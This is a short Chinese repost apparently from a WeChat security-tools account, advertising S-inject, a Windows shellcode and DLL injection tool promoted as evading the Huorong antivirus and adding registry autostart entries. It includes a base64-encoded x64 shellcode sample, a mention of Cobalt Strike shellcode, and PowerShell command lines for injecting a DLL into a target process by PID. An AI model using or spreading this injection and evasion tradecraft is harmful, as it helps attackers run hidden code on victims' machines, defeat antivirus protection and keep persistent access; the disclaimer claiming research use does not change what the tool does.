0x01 工具介绍
远程shellcode注入等功能可免杀火绒,VNC无感,可注册表添加开机自启动。
0x02 安装与使用
一、Shellcode注入
这里以64为windows10版本Calc shellcode位例子(虽然会崩溃) shellcode来源:https://github.com/boku7/x64win-DynamicNoNull-WinExec-PopCalc-Shellcode base64编码后shellcode
SDH/SPfnZUiLWGBIi1sYSItbIEiLG0iLG0iLWyBJidiLWzxMAcNIMclmgcH/iEjB6QiLFAtMAcJNMdJEi1IcTQHCTTHbRItaIE0Bw00x5ESLYiRNAcTrMltZSDHASIniUUiLDCRIMf9BizyDTAHHSInW86Z0BUj/wOvmWWZBiwREQYsEgkwBwFPDSDHJgMEHSLgPqJaRuoeanEj30EjB6AhQUeiw////SYnGSDHJSPfhUEi4nJ6TnNGah5pI99BQSInhSP/CSIPsIEH/1g==
以CobaltStrike Shellcode为例子
二、DLL注入
echo "<option index>`n`<DLL Path>`n`<PID>" | <S-inject Path>#echo "1`n`D:GithubS-injectTest FilesTestDll_x64.dll`n`20176" | D:GithubS-injectx64ReleaseS-inject.exe
cmd,推荐使用powershell启动
powershell -c echo "<option index>`n`<DLL Path>`n`<PID>" | <S-inject Path>#powershell -c echo "1`n`D:GithubS-injectTest FilesTestDll_x64.dll`n`20176" | D:GithubS-injectx64ReleaseS-inject.exe
三、免杀效果
https://github.com/Joe1sn/S-inject
原文始发于微信公众号(Web安全工具库):DLL+Shellcode的Windows注入免杀工具
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论